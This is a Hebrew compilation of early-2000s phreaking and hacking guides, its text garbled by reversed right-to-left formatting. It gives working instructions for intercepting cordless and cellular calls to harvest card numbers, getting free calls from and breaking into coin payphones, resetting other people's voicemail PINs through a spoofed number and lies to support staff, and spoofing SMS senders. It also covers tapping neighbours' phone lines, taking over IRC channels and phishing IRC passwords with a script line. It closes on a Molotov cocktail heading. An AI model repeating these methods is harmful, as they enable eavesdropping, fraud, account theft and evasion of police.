‫‪.‬מוסיף מיקרופון נוסף לטלפון ‪neon box -‬‬
‫‪.‬מוסיף רעש לקו ‪noise box -‬‬
‫‪.‬משמש כפעמון נוסף לטלפון ‪olive box -‬‬
‫נותן לך לעשות שיחות חינם מטלפונים ציבוריים בארה"ב* ‪red box -‬‬
‫מוסיף מוסיקה לקו הטלפון שלך‪ ,‬מהכרטיס קול או ממערכת סטריאו ‪rock box -‬‬
‫חייגן צלילי טלפון נייד ‪white box -‬‬
‫‪by aiti‬‬
‫המדריך המלא לסריקת תדרים באוויר‬
‫‪,‬הקדמה‪ :‬אני בטוח שחלקכם כבר קראתם טקסט שלי על סריקות‬

‫‪....‬אבל אז היה מדובר על סריקות של מספרי טלפון‬
‫‪,‬כאן מדובר על סריקות של תדרים באוויר‪ ,‬עולם חדש של ציטוט והאזנה‬
‫‪...‬שטח חדש של פריקינג‬
‫???‪ scanner‬מה זה ‪1.‬‬

‫מאוד משוכלל ‪ walkie talkie‬סקנר הוא בעצם‬
‫(!ואל תתבלבלו עם סורק לניירות)‬
‫???מה הוא עושה ‪2.‬‬

‫‪.‬בעצם ‪ walkie talkie‬סקנר הוא מכשיר שיכול לקלוט ולשדר מידע בתדרים שונים‪ ,‬כמו‬
‫‪walkie talkie‬מה ששונה זה שסקנר יכול לקלוט מידע מאפילו ‪ 5‬קילומטרים‪ ,‬בעוד ש‬
‫‪.‬יכול לקלוט מידע ממקסימום ‪ 200‬מטר‬
‫?מה סקנר יכול לעשות ‪3.‬‬

‫‪:‬סקנר יכול להאזין לתדרים שונים באוויר‪ ,‬ואתה יכול לקלוט את השידורים הבאים‬
‫רדיו‬
‫טלפונים אלחוטיים‬
‫(טלוויזיה (קול בלבד‬
‫טלפונים סלולריים אנלוגיים‬
‫רדיו קשר של משטרה‬
‫רדיו קשר של מכבי אש‬
‫רדיו קשר של מגן‪-‬דוד‪-‬אדום‬
‫('רדיו קשר של חברות אבטח שונות (בתי ספר‪ ,‬אוניברסיטאות‪ ,‬מלונים וכו‬
‫מוניות‬
‫(מיקרופונים ניידים (כמו בתיאטרון‬
‫כאשר אתה מאזין לטלפונים אלחוטיים‪/‬סלולריים‬

‫‪.‬אתה יכול לקלוט מידע על אנשים‪ ,‬מספרי בזקכרט ומספרי כרטיסי אשראי‬
‫?אוקי‪ ,‬איפה אני יכול לקנות סקנר ‪4.‬‬
‫‪,‬קודם כל צריך להבין שסקנר יכול לעלות בין ‪ 200‬ל‪ 2000‬ש"ח‬

‫‪.‬וקשה מאוד למצוא אותו בארץ למכירה‬
‫שם אני ‪ uniden.com‬או מהאתר של ‪ ebay.com‬אני מציע לקנות מאתרי מכירות פומביות כמו‬
‫‪.‬קניתי‬
‫‪.‬כמו כן אני ממליץ מאוד לקנות אנטנה מורחבת‪ ,‬שיכולה לתת לכם טווח כפול וזה ממש לא יקר‬
‫?איך אני יכול למצוא לאיזה מספרים אנשים חייגו בטלפון אלחוטי ‪5.‬‬
‫‪...‬די פשוט‬
‫רק צריך לקנות כבל של אוזניות שהוא זכר‪/‬זכר (תקע‪/‬תקע) ולחבר‬
‫את יציאת האוזניות של הסקנר לכניסת ה‬
‫‪audio in‬‬
‫‪,‬של המחשב‬
‫שניתן (‪ )dtmf‬ולהפעיל את תוכנת זיהוי צלילי הטלפון‬
‫‪.‬להשיג באתר‬
‫?לאיזה תדרים אני צריך להאזין ‪6.‬‬

‫(אלפונים אלחוטיים‪( :‬לנסות להקשיב לאחד מ‪ 25‬התדרים‬
‫‪handset base channel‬‬

‫‪------- ---- -------‬‬
‫‪1 43.720 48.760‬‬
‫‪2 43.740 48.840‬‬
‫‪3 43.820 48.860‬‬
‫‪4 43.840 48.920‬‬
‫‪5 43.920 49.000‬‬
‫‪6 43.960 49.080‬‬
‫‪7 44.120 49.100‬‬
‫‪8 44.160 49.160‬‬
‫‪9 44.180 49.200‬‬
‫‪10 44.200 49.240‬‬
‫‪11 44.320 49.280‬‬
‫‪12 44.360 49.360‬‬
‫‪13 44.400 49.400‬‬
‫‪14 44.460 49.480‬‬
‫‪15 44.480 49.500‬‬
‫‪16 46.610 49.670‬‬
‫‪17 46.630 49.845‬‬
‫‪18 46.670 49.860‬‬
‫‪19 46.710 49.770‬‬
‫‪20 46.730 49.875‬‬
‫‪21 46.770 49.830‬‬
‫‪22 46.830 49.890‬‬
‫‪23 46.870 49.930‬‬
‫‪24 46.930 49.990‬‬
‫‪25 46.970 49.970‬‬
‫כדאי מאוד לנסות להקשיב לצד של הבסיס ולא לצד של הטלפון עצמו‬
‫‪.‬השאר‪ :‬כאן תראו את שאר התדרים האפשריים ומה הם מכילים‬

‫ולא בקילו הרץ (‪ )mhz‬התדרים הם במגה הרץ‬
‫עד ‪ - - 54‬טלוויזיה ‪72‬‬
‫‪ fm‬כד ‪ - - 108‬רדיו ‪88‬‬
‫עד ‪ - - 136‬מטוסים ‪108‬‬
‫עד ‪ - - 144‬צבא ‪136‬‬
‫עד ‪ - - 150.6‬צבא ‪148‬‬
‫עד ‪ - - 153‬מוניות ‪152‬‬
‫עד ‪ - - 155‬מכבי אש ‪154‬‬
‫עד ‪ - - 156‬משטרה ‪155‬‬
‫עד ‪ - - 158‬ספינות ‪156‬‬
‫עד ‪ - - 160‬משטרה ‪158‬‬
‫עד ‪ - - 174‬ממשלתי ‪162‬‬
‫עד ‪ - - 220‬טלוויזיה ‪174‬‬
‫עד ‪ - - 454‬משטרה ‪453‬‬
‫עד ‪ - - 460‬משטרה ‪458‬‬
‫‪by aiti‬‬
‫פריצה לטלפונים שעובדים על מטבעות‬
‫‪:‬הקדמה‬
‫אני בטוח שחלקכם כבר שמעתם על שיטה זו או אחרת לשיחות חינם‪ ,‬גם אם השיטה הייתה במקור‬
‫‪...‬רעיון שלי‬
‫‪....‬השיטה הבאה תעבוד ב‪ 80%‬מהטלפונים‪ ,‬לא כמו שיטה אחרת שתעבוד אולי רק על ‪5%‬‬
‫?‪ cocot‬מה זה טלפון מופעל מטבעות‬
‫?אתם מכירים את הטלפונים הציבוריים שעובדים על מטבעות‬

‫הם לא שייכים לבזק אלא שייכים לחברת התקשורת המחזיקה אותה‪ ,‬לבעל החנות שבה נמצא‬
‫‪'..‬הטלפון וכו‬
‫‪.‬אחת הבעיות עם הטלפונים האלו זה שאי אפשר להתקשר אליהם‪ ,‬אבל כן יש להם מספר‬
‫מה שמיוחד בטלפונים האלו זה שהם עובדים על קו רגיל של בית‪/‬עסק ולא על‬
‫‪...‬קו מיוחד כמו הטלפונים הציבוריים‪ ,‬בגלל זה יש כמה שיטות להרוויח באלה שיטות חינם‬
‫‪!:‬אז הנה השיטה‬

‫‪%%%%%%%%%%%%%%‬‬
‫('קודם כל תמצאו טלפון כזה שמופעל על כסף (בביה"ס‪ ,‬בקניון‪ ,‬בבית‪-‬חולים‪ ,‬במועדון וכו‬
‫‪',‬עכשיו תיגשו אליו ותחייגו מספר ‪ 1800‬כלשהוא‪ ,‬או שתתקשרו ל‪ 199‬וכו‬
‫‪...‬בדרך כלל הטלפון לא יצטרך כסף‪ ,‬אבל אם הוא כן יבקש אז תשלמו‪ ,‬הוא יחזיר את הכסף אחר כך‬
‫(!כשיענו אז תתחילו להגיד שטויות‪ ,‬עד שינתקו לכם‪( .‬אל תנתקו בשום מקרה‬
‫?מה אתם שומעים עכשיו אחרי שניתקו‬
‫‪1. krench‬‬
‫(‪...‬צליל חיוג! (בפממממממ ‪2.‬‬
‫??מה קרה אתם שואלים‬
‫כאשר אתם מרימים את השפורפרת בהתחלה תשמעו צליל חיוג מזוייף‪ ,‬שמיוצר על ידי הטלפון‬
‫‪....‬ולא על ידי הפולסים בקו‬
‫!עכשיו יש לכם צליל חיוג ואתם יכולים להתקשר לכל מקום‬
‫!רגע‪ ,‬על מה אתה מדבר? שאני מנסה לחייג המקשים לא מגיבים‬

‫‪...‬זה היה אבטחה עלובה של הטלפון‬
‫‪:‬עכשיו יש לכם ‪ 2‬אפשרויות‬
‫‪.‬מארה"ב‪ ,‬שעושה צלילי חיוג ואז תוכלו להשמיע את הצלילים לטלפון ‪ tone dialer‬לקנות ‪1.‬‬
‫‪.‬להשתמש בשיטת חיוג הישנה של פולסים ‪2.‬‬

‫‪:‬השיטה עובדת כך‬
‫(כדי להקיש את הספרה ‪ 1‬מקישים פעם אחת על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫(כדי להקיש את הספרה ‪ 2‬מקישים שתי פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫(כדי להקיש את הספרה ‪ 3‬מקישים שלוש פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫‪.‬מקישים על הכפתור לבערך רבע שנייה‬
‫‪.‬כדי להקיש ‪ 0‬לוחצים ‪ 10‬פעמים‬
‫!אתם יכולים לנסות את השיטה בטלפון בבית שלכם‬
‫!עכשיו אתם יכולים להתקשר לכל העולם‬

‫!תתקשר למספרי סקס‪ ,‬פלאפונים‪ ,‬כווית וסתם להתקשר לסין‬
‫!ועכשיו בונוס‬
‫‪18.2.2001‬‬ ‫בונוס‪ :‬כיצד לפרוץ לטלפונים מופעלי מטבעות‬

‫‪%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%‬‬
‫‪ aiti‬נכתב על ידי‬
‫!ניסיתם פעם להתקשר לטלפון ציבורי? אפשר‬

‫‪...‬יש לו מספר שמופיע למעלה‪ ,‬מעל הטלפון‬
‫(אי‪-‬אפשר להתקשר‪( ...‬רק בשביל שבעלי הטלפון הזה ירוויחו כסף ‪cocot‬אבל ל‬
‫‪,‬אבל זה לא אומר שאין לו מספר‬
‫‪.‬היחידים שמתקשרים למספר הזה הם החברה שבנתה את הטלפון‪ ,‬כדי לנהל אותו ולשנות לו הגדרות‬
‫כדאי להשיג את המספר אתם מכניסים שקל לטלפון‪ ,‬מקישים ‪ ,110‬רושמים את המספר‪ ,‬הכסף יחזור‬
‫‪,‬אליכם‬
‫!ויש לכם את המספר‬
‫‪:‬כאשר אתם מתקשרים למספר הזה אתם תשמעו אחד משתי דברים‬
‫קול ממוחשב המבקש ממך להכניס את סיסמתך ‪1.‬‬

‫(!בתוך טלפון ‪bps‬צליל של מודם מוזר (כן‪ ...‬מודם במהירות ‪2. 300‬‬
‫‪.‬במקרה הראשון אתם צריכים לנחש את הסיסמא‪ ,‬ואז תוכלו לשנות הגדרות‬
‫‪.‬ובמקרה השני אתם צריכים להתחבר לטלפון דרך היפר טרמינל וגם אז הטלפון יבקש סיסמא‬
‫(?אחרי שפרצתם תוכלו בדרך גלל גם לשנות את המחיר של שיחה (‪ 5‬אגורות‬
‫‪by aiti‬‬
‫תדרים‬
‫ רשימה של תדרים ברשת ה‬dtmf.
‫ קבוצה נמוכה‬:
1, 2, 3, a < 967hz
4, 5, 6, b < 770 hz
7, 8, 9, c < 825 hz
‫קבוצה הכי גבוהה‬
* 0 # d < 941 hz
^ ^ ^ ^
1209hz 1336hz 1477hz 1633hz
& ‫ נא לעבור למצב אנגלית‬, ctrl+shif )‫(שמאלי‬.
‫תודה ל‬: aiti, julian macassey, n6are.

------------------------------------------------------------------------------------
‫הנה רשימה של מכשירים שניתן לצרוב את הקווים ואולי אם תהיו נחמדים אני יוציא על זה מדריך‬,
8-: ‫עוד איזה שנה אולי‬
‫הרשימה‬:
motorola scn2025a: 4 mei ht5000: 3 mercury 200: 2 diamondtel 200: 1 diamondtel alpine 9510: 1 alpine 9511: 1
motorola scn2034a: 4 mitsubishi 460 xtal: 2 90x: 1 diamondtel 95: 1 amps all: 2 antel radiant
motorola tln2574a: 4 mitsubishi 555: 1 mitsubishi diamondtel mesa 50: 4/2 832xl: 2 ara pro-comm 1800:
motorola tln2659a: 4 560: 1 mitsubishi 600: 1 diamondtel mesa 52: 4 1 astrotel 500: 1 astrotel 580:
motorola tln2724a: 4 mitsubishi 700: 4 mitsubishi diamondtel mesa 52a: 4 1 astrotel 591: 1 at&t 1710: 1
motorola tln2726a: 4 800: 1 mitsubishi 900: 1 diamondtel mesa 55: 2 audiote/toshiba cmt500: 2
motorola tln2733a: 4 mitsubishi 1500: 1 mitsubishi diamondtel mesa 55ax: 4 audiotel bc-20: 2 audiotel
motorola tln2734a: 4 mark 1 301: 2 mitsubishi diamondtel mesa 55bx: 4 cmt-125: 2 audiotel cmt-135:
motorola tln2777a: 4 mark 1 401: 2 mitsubishi diamondtel mesa 60: 4 2 audiovox bc20: 2 audiovox
motorola tln2867a: 4 mark 1 450: 2 mitsubishi diamondtel mesa 60x: 4 bc40: 1 audiovox bc45: 1
motorola tln2879a: 4 mark 1 455: 2 mitsubishi diamondtel mesa 80: 4 audiovox cmt-125: 2
motorola 8000h: 4 motorola mark 1 500: 2 mitsubishi diamondtel mesa 90x: 4 audiovox cmt-135: 2
ultra classic: 4 mark 1 555: 2 mitsubishi diamondtel mesa 95: 4 audiovox cmt1700: 1
mark 1 560: 2 mitsubishi diamondtel mesa 99x: 4 dyna audiovox cmt400: 1 audiovox
mark 1 600: 2 mobira me-300: tac 2000: 2 dyna tac 2000x: 2 cmt405: 1 audiovox cmt450: 1
1 mobira me-53a: 3 mobira dyna tac 4000: 2 dyna tac audiovox cmt550: 1 audiovox
me-57: 1 mobira tpa 4/400: 1 4500l: 2 dyna tac 4500xl: 2 cmt600: 1 audiovox cmt605: 1
mobira tpa 5/500: 1 motorola dyna tac 6000: 2 dyna tac audiovox cmt750: 1 audiovox
scn2115a: 4 motorola 6000x: 2 dyna tac 6000xl: 2 ctx1500: 1 audiovox ctx2500:
scn2119a: 4 motorola e.f. johnson: 2 fujitsu 170 1 audiovox ctx4000: 1
scn2124a: 4 motorola portable: 1 fujitsu 183-iix: 1 audiovox ctx5000: 1 colt
scn2126a: 4 motorola fujitsu fm80m-360: 2 fujitsu transportable: 1 diamondtel
scn2133a: 4 motorola fm80m-362: 2 gateway cp 100: 1
scn2134a: 4 motorola 900: 1 ge star: 2 goldstar
scn2020a: 4 motorola 5000: 1 hitachi cr2100: 1
scn2021a: 4 hitachi cr2100h: 1
by pirs[i]ng
‫ שיטה ב‬- ‫שיחות חינם בטלפונים שעובדים על מטבעות‬
‫ שיטה לעשות שיחות חינם בטלפונים של‬cocot / pirs[i]ng

cocot ‫ הוא‬- "customer owned customer operated telephone".
‫ קניון וכו‬,‫ספריה‬,‫ טלפון אשר נמצא במסעדה‬- ‫'זאת אומרת‬.
‫ אבל בכל זאת יש להם מספר‬,‫יש בעיה בטלפונים האלה שאי אפשר לחייג אליהם‬.
‫בזק לא מחזיקה את המכשירים האלה אלה בעל העסק שבו נמצא המכשיר‬.
‫המכשיר לא עובד על קו כמו של טלפון ציבורי לכן יש כמה שיטות להרוויח שיחות חינם‬,
‫פה אני יראה לכם שיטה שאני יודע שהיא עבדה פעם אבל לא בטוח שהיא תעבוד לכם עכשיו‬.
‫כי האנשים שמחזיקים את הטלפונים האלה כל יום נזהרים יותר יותר מפריקרים ושמים יותר לב‬
‫‪.‬לזה‬
‫‪.‬אז אם הטריק לא יעבוד אל תשלחו לי דואר שזה לא עובד כי שום דבר לא מובטח‬
‫‪(.‬בלבד ‪ )cocot‬לכו לטלפון המבוקש‬
‫‪(.‬חייגו לאחד המספרים שאתם מכירים באזור ‪( 1-800‬שיחות חינם‬
‫‪.‬המכשיר אמור להרשות לכם לקיים את השיחה‬
‫‪,‬התחילו לדבר עם מי שעונה לכם ודברו שטויות או משהו כזה‬
‫‪.‬תגרמו לו לנתק את השיחה קח שאתם לא נתקתם‪ ,‬אלא מי שדיברתם איתו‬
‫‪.‬לאחר מכן חייגו את המספר שרציתם מהתחלה וזה אמור לעבוד‬
‫‪.‬אם זה לא עובד פעם ראשונה נסו שוב אבל אם זה לא עובד הרבה פעמים אז וותרו כי זה לא יפעל‬
‫‪.‬חבר ותיק מאירופה ‪ - kolichoice -‬תודה רבה ל &&‬
‫‪by prising‬‬
‫פריצה למשיבון סלולרי‬
‫כל הכתוב כאן הוא ללימוד החומר ואין להשתמש בו‪ ,‬כל דבר אשר יקרה לכם או לחבריכם לא‬
‫‪.‬באחריות הכותב‬
‫‪:‬אתם בוחרים מספר כלשהו‪ ,‬נגיד הוא‬

‫‪053000000‬‬
‫‪052000000‬‬
‫‪058000000‬‬
‫(אתם הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר‬
‫‪.‬מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם שינוי קטן‬
‫אם הוא היה‬
‫‪052 - 000 - 000‬‬
‫| | |‬
‫‪2352 000 000‬‬
‫‪053 - 000 - 000‬‬

‫| | |‬
‫‪2353 000 000‬‬
‫‪058 - 000 - 000‬‬

‫| | |‬
‫‪2358 000 000‬‬
‫‪ :‬הסבר פורט יותר‬

‫אזור סלקום ‪235 -‬‬
‫הספרה האחרונה בקידומת ‪3,5,8 -‬‬
‫המספר כרגיל ‪000000 -‬‬
‫אתם משנים למספר שרציתם ואז מתקשרים לשירות לקוחות ‪123* :‬‬
‫אתם אומרים‪ :‬שלום‪ ,‬יש לי משיבון ושכחתי את הסיסמא‪ ,‬אפשר לברר אצלכם או אולי לאפס לי‬
‫הסיסמא‬
‫של המשיבון או משהו כזה (דברו רגיל וחופשי)‪ ,‬היא אומרת מה המספר שאתה מדבר ממנו (יש להם‬
‫‪(,‬שיחה מזוהה‬
‫אתה עונה את המספר שכתבת בטכנאות של הקוד רק את *המספר המקורי היא אומרת הוא יאופס‬
‫תוך ‪ 10‬דקות‬
‫‪.‬הקוד יהיה ‪ .)1234‬אתה אומר‪ :‬טוב תודה‪ ,‬להתראות)‬
‫‪----------‬סוף‪----------‬‬
‫‪.‬אם כתבת ‪ 2353000000‬אתה מחזיר אותו למקור‪* 053-000000 ,‬‬

‫ואז מאיזה מכשיר שאתם רוצים אתם מתקשרים ויודעים את הסיסמא של המשיבון של הקו‬
‫‪.‬שבחרתם‬
‫‪.‬טיפים ‪ -‬תתלבשו על מכשירי על טוקמן‪ ,‬כי שואלים פחות שאלות זה יותר קל לתחמון‬
‫‪.‬עכשיו שירות הלקוחות של טומקן זה *‪779‬‬
‫בונוס אם רשמתם בטכנאות של הפלאפון מספר של מכשיר טוקמן אתם גם תמיד יכולים להתקשר ל‬
‫*‪777‬‬
‫‪.‬ולברר מצב חשבון עדכני של הקו‪ .‬אבל זה לא תמיד עובד‪ ,‬תלוי בקו ובמכשיר‬
‫‪by pirsing‬‬
‫זיוף מספר השולח בשילחת ההודעות‬
‫‪:‬מצרכים דרושים‬
‫‪ i.‬מכשיר פלאפון נוקיה ‪ 5120/6120‬בקו סלקום גירסא &‬
‫(‪ a‬היא שבתפריט הודעות טקסט מופיעה האפשרות כתיבת הודעות‪ ,‬אין אותה בגירסא ‪ i‬גירסא) &‬
‫(אם אינה נתנת האפשרות במכשיר לשלוח הודעות כתובות אנא סגרו את החלון) &&‬
‫‪--------------------------------------------------------------------------------------------‬‬
‫‪ :‬יאללה לעבודה‬
‫*הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר) שהוא‪1. 3001#12345# :‬‬
‫מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם ‪2.‬‬
‫‪.‬שינוי קטן‪ .‬כתבתי על זה במדריך על פריצה למשיבונים אבל הנה תזכורת‬
‫‪:‬המספר הוא‬
‫‪052000000 -->> 2352000000‬‬
‫‪053000000 -->> 2353000000‬‬
‫‪058000000 -->> 2358000000‬‬
‫‪.‬משנים את השורה ושומרים ויוצאים‪ ,‬מפעילים את המכשיר מחדש ‪4.‬‬
‫‪,‬כדי לוודא שהכל עובד נכון אנא חייגו לאחד המספרים הנזכרים למטה &&&‬
‫‪.‬אם קבלתם צליל חיוג אתם בסדר‬
‫‪(.‬טוקמן בלבד) ‪*777‬‬
‫‪(.‬טוקמן בלבד) ‪*779‬‬
‫‪(.‬כל הלקוחות) ‪*123‬‬
‫לא חובה אבל אפשרי‪ ,‬אם לא קיבלתם צליל נורמלי אז בדקו את המספר שכתבתם באבטחה ואת‬
‫‪.‬המספר שחייגתם‬
‫‪.‬אם עדיין יש בעיות אז כנראה היא במכשיר אבל אם לא אז שלחו לי אימייל ונראה מה קורה‬
‫‪:‬יאללה נמשיך‬
‫‪ :‬לכו ל ‪5.‬‬
‫‪.‬תפריט‪ ,‬הודעות‪ ,‬הודעות טקסט‪ ,‬כתיבת הודעות‬
‫‪(.‬כתבו הודעה (מה שבא לכם‬
‫‪.‬עכשיו משהו כדי שתדעו לידע אישי‬
‫‪.‬כאשר ההודעה תגיע לנמען המספר השולח יהיה זה שכתבתם בקוד טכנאי &&&&‬
‫‪.‬כמו כן יש לוודאות שהמצב של הקו שאתם שולחים ממנו (יותר ממנו עליו) לא במינוס בחשבון‬
‫! כמו שאמרתי טוקמן תמיד עדיף‪ .‬פחות מורכז ופשוט יותר &&&&&‬
‫>‪<----------------------------------------------------------------------------------------‬‬
‫! עכשיו אני הולך להגיד משהו שקצת ירתיע אתכם אבל זה שטויות‪ ,‬מנסיון אישי‬
‫‪,‬יש סיכוי קלוש ביותר שדווקא תתבצע עוד קבלת‪-‬שליחת נתונים על הקו שעליתם עליו‬
‫אז יש סיכוי שיעלו עליכם אבל לא יאתרו אתכם אבל כמו כן יבדקו של מי המכשיר‬
‫‪:‬ואז יבואו אליכם אבל לא לפחד יש דרכים לצאת מזה‬
‫‪.‬גנבו לי את הפלאפון והרגע מצאתי אותו ‪1.‬‬
‫‪.‬איזה חבר שלי שיחק אותה מבין ועשה לי איזה שינויים בו לא ידעתי מה הוא עושה ‪2.‬‬
‫‪.‬איבדתי את המכשיר ורק עכשיו מצאתי אותו ‪3.‬‬
‫‪.‬אבל כל זה סיכוי של ‪ 1‬למיליון שזה יקרה אבל אלה שקוראים את המדריכים שלי צריכים לדעת הכל‬
‫>‪<----------------------------------------------------------------------------------------‬‬
‫‪beige box‬‬
‫הערות‪ :‬אני לא אחראי לכל שימוש בחומר הכתוב כאן‪ ,‬חומר זה הוא‬
‫!למטרות לימודיות בלבד ו‪++--‬אין‪ --++‬להשתמש בו‬
‫‪.‬מי שמתחיל בפריקינג שיקרא קודם כל את הטקסט שאלות תשובות‬
‫??‪ beige box‬מה זה‬

‫‪+++++++++++++++++‬‬
‫‪,‬היא קופסא המאפשרת לך להתחבר לקווי טלפון של אנשים אחרים ‪beige box‬‬
‫‪.‬להתקשר על חשבונם‪ ,‬ולצותת לשיחות שלהם‬
‫?מה אני צריך כדי לבנות את הקופסא‬

‫‪++++++++++++++++++++++++++++++++‬‬
‫יש שתי שיטות להשתמש בקופסא‪ :‬אחת בדירות דרך הקיר‪ ,‬והשנייה דרך קופסאת הטלפון הראשית‬
‫שנמצאת ברחוב (אתם מכירים את הקופסאות הגדולות האלה ברחוב שיש עליהם סמל של בזק‪,‬‬
‫‪?(.‬נכון‬
‫‪:‬חומרים לשיטה הראשונה‬

‫פטיש @‬
‫חוט טלפון @‬
‫מלחם @‬
‫שקע טלפון חדש ל מחובר @‬
‫פנס @‬
‫קצת בדיל @‬
‫טלפון @‬
‫‪...‬קצת חוש טכני @‬
‫‪:‬חומרים לשיטה השנייה‬

‫טלפון ‪%‬‬
‫חוט טלפון ‪%‬‬
‫מברג עם ראש שטוח ‪%‬‬
‫פנס ‪%‬‬
‫‪...‬קצת חוש טכני ‪%‬‬
‫כיצד לבנות‬
‫&&&&&&&&&&&‬
‫‪.‬השיטה הראשונה תוסבר בהסבר על השימוש‬
‫‪:‬שיטה שנייה‬
‫(?קחו את חוט הטלפון‪ ,‬וחברו אותו לטלפון‪( .‬זה היה קשה נכון‬
‫שימוש‬
‫^^^^^^‬
‫‪:‬שיטה ראשונה‬
‫‪.‬קודם כל תחתכו את חוט הטלפון שלכם והפרידו בין החוט הירוק לאדום‬
‫(תמצאו את קופסת החשמל הכללית שלו וסגרו לו את החשמל‪( .‬אתם לא רוצים להתחשמל‬
‫‪.‬אחר‪-‬כך קחו את הפטיש ותשברו חלק מהקיר המשותף‪ ,‬בחלק התחתון‬
‫‪.‬הסתכלו פנימה עם פנס‪ ,‬ותחפשו חוטי טלפון‬
‫אחרי שמצאתם תלחימו את החוט הירוק עם החוט הירוק שלכם‪ ,‬ואת החוט האדום עם החוט‬
‫‪.‬האדום שלכם‬
‫קחו את החוט שלכם וחברו את הקצה השני לטלפון שלכם‪ .‬הרימו את השפורפרת‪ ,‬שומעים צליל‬
‫?חיוג‬
‫‪.‬אם כן אז תחזירו לשכנים את החשמל שלהם‬
‫(שיטה זה יכולה לעבוד בשינויים קלים גם כדי לגנוב חשמל וכבלים)‬
‫‪:‬שיטה שנייה‬
‫‪.‬לכו אל הקופסאת טלפון של בזק‬
‫‪.‬פתחו אותה (חלקם לא יעבדו כי יהיה צריך מפתח) בעזרת המברג‬
‫‪.‬חברו את חיבור הטלפון לאחד משקעי הטלפון‬
‫‪.‬אם אתם שומעים צליל חיוג הישארו בחיבור הזה‪ ,‬אם לא אז תחברו לבא אחריו‬
‫‪.‬השיטה הזה תעבוד גם בחיבור של בית בודד בלבד‪ ,‬אך בדרך כלל צריך סולם בשביל זה‬
‫?מה לעשות אחרי שהתחברתי‬

‫************************‬
‫‪.‬שהוא בישראל ‪ 110‬ותגלו מה המספר של מי שהתחברתם אליו ‪ ani‬קודם כל תתקשר למספר‬
‫עם מישהו מדבר בקו הזה אתם יכולים להישאר ולהאזין‪ ,‬אך עם הקו לא בשימוש אתם יכולים‬
‫‪ )$$$sex(.‬להתקשר לכל מספר שאתם רוצים‬
‫הערות קטנות לסיום‪* :‬אני לא אחראי לכל שימוש בחומר הכתוב כאן‪ ,‬חומר זה הוא למטרות‬
‫ו‪++--‬אין‪ --++‬להשתמש בו‬ ‫!לימודיות בלבד‬
‫כל הכתוב כאן הוא בלשון זכר אך מכוון לכולם‪ ,‬היתיי יכול לכתוב אחרת אבל נראה *‬
‫‪.‬לי שאין בכלל בישראל פריקריות‬
‫‪by aiti‬‬
‫פריצת חדרים ב ‪mirc‬‬
‫???‪....‬למה לי ללכלך את הידיים וליפרוץ לחדר‬
‫(‪...‬אם אין לכם את הסיבה הזאת‪ ...‬או אחרת ששווה‪ ...‬אל תיפרצו זה לא שווה את המאמץ)‬
‫ת= תיראו‪ ..‬נגיד‪ ..‬שיש איזה אופ בחדר גדול‪ ..‬והאופ הזה‪ ..‬זורק אותכם בגלל שלא יודע‪ ...‬אמרתם‬
‫משהו על הפוקימון שהוא אוהב‪ ....‬נגיד אז הוא זורק אותכם‪( ....‬זאת הסיבה הכי מומלצת לפרוץ‬
‫(‪...‬לחדרים‪ ...‬זה והיתערבות‬
‫‪..‬אז בכל אופן הוא זורק אותכם ואתם רוצים להחזיר לו‬
‫!?!?ש= נו‪ ...‬אז איך אני מחזיר‬

‫ת= זה הטקסט‪ ..‬דבר ראשון‪ ....‬צריך למצוא סרבר‪ ...‬אבל כזה שאולי ויפול לכמה שניות‪ ..‬אחרי‬
‫שמצאתם אחד כזה (נורא קשה לימצוא!!!) אתם פותחים שם את החדר ומשיגים אופ‪ ..‬תירשמו שם‬
‫‪....‬את החדר זה נותן מעמד של פאונדר‬
‫‪...‬אתם תוכלו לחזור לשרת שהוא יחזור (‪.. )split‬בכל אופן‪ ...‬שהשרת יפול‬
‫!!!ואז להיתחבר לשרת של החדר‪ ...‬ונחשו מה? יהיה לכם שם אופ!!! כן כן כן‬
‫^‪by ^dak0da‬‬
‫פריצת ניקים ב ‪mirc‬‬
‫‪...,‬יש כמה דרכים‪ ...‬אני יגיד ‪ 3‬ושלושתם דורשים כושר שיכנוע מסויים‬
‫אתם רק צריכים איזה אחד פרייאר‪ ...‬אבל ממש פרייאר‪ ....‬כזה שאם תגידו לו להיזדהות לניק אצל‬
‫‪...‬הבוט החדש שלכם הוא יעשה את זה טוב‬
‫‪oooooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫(‪...‬דרך א‪( -‬אנ'לא בטוח שזה עובד‬

‫‪:‬זה אמור ללכת ככה‬
‫‪<you> yo, fuck man...‬‬

‫? >‪<@fuck-man‬‬
‫‪<you> plz... chak it out... alt+0266 on your number pad...‬‬
‫‪<@fuck-man> fine...‬‬
‫‪<@fuck-man> n12snfokk‬‬
‫!!!‪<you> nice password ass hole‬‬
‫‪ooooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫(‪...‬דרך ב‪( -‬לא יעבוד על כאלו שמבינים‬
‫(‪...‬ליכתוב דוגמא לסקריפט (רק למי שיודע‬

‫(‪... )auto-identify‬לישלוח לקורבן ולהגיד לו לבדוק את ההיזדהות האוטומטית‬
‫‪...‬הפקודדה צריכה להראות כך‬
‫"?‪auto-ident:/msg memoserv send <your nick> $$?="password to auto-identify‬‬
‫(‪...‬תגידו לקורבן לשים את זה בא פופאפ‪( ...‬הוא חייב להיות דביל‬
‫‪oooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫‪...:‬עוד אחד‪ ...‬זה ממש צריך להיות ילד פרייאר כדי שזה יעבוד‬
‫‪<|[you]|> y0 zero33‬‬
‫?‪<zero33> yeah‬‬
‫‪<|[you]|> here's the new bot. i'm setting up accounts now. he will bild a server for you.‬‬
‫‪msg it this-‬‬
‫>‪add+protected user <your nick> <your nick's password‬‬
‫‪<zero33> ok‬‬
‫‪:‬הערה‬
‫למבינים בסקריפטינג‪ ...‬כדי לבנות בוט ולא להוריד אחד‪ ...‬כי אז‪ ..‬לא יאמינו לכם‪ ..‬אם אתם‬
‫מורידים אז‬
‫‪ www.mircx.com‬תורידו אחד מהאלה של‬
‫‪...‬תיבחרו אחד מהאמצע כדי שאף אחד לא יזהה‬
‫^‪by ^dak0da‬‬
‫בקבוק תבערה‬
‫‪...(:‬הכי פשוט זאת השיטה הכי פשוטה והכי טובה שיש)‬
